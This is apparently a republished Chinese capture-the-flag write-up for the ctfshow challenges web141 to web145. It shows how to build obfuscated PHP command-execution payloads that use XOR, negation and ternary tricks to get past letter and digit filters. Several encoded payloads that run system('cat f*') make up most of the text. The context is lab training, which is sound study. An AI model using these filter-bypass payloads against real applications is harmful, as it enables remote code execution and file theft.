1.web141
^\w+$表示在开头和末尾匹配字母数字_,传入的v3值不能有字母数字_,即无字母的命令执行
php中1-phpinfo()是可以执行的,加减乘除都可以实现
这里或,异或,取反等运算都可以
这里采用羽师傅的异或脚本生成payload
payload:
#system('cat f*')
v1=1&v2=1&v3=-("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%03%01%08%00%06%00"^"%60%60%7c%20%60%2a");
2.web142
payload:
v1=0
3.web143
过滤了取反,+,-等符号,还可以用或异或等运算
重新用脚本生成payload
payload:
#system('cat f*')
v1=1&v2=1&v3=*("%0c%06%0c%0b%05%0d"^"%7f%7f%7f%7f%60%60")("%03%01%0b%00%06%00"^"%60%60%7f%20%60%2a")*
4.web144
和上题类似
#system('cat f*')
v1=1&v2=1&v3=-("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%03%01%08%00%06%00"^"%60%60%7c%20%60%2a");
5.web145
过滤了加减乘除和异或,这里可以用三目运算符绕过
#system('cat f*');
v1=1&v2=0v3=?(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%99%D5):
或,异或,取反命令构造脚本https://blog.csdn.net/miuzzx/article/details/109143413https://blog.csdn.net/miuzzx/article/details/109143413
参考文章文章来源:https://www.toymoban.com/news/detail-836720.html
CTFSHOW PHP特性篇 (下篇132-150)_https://blog.csdn.net/miuzzx/article/details/109197158文章来源地址https://www.toymoban.com/news/detail-836720.html
到了这里,关于ctfshow web入门 web141-145的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!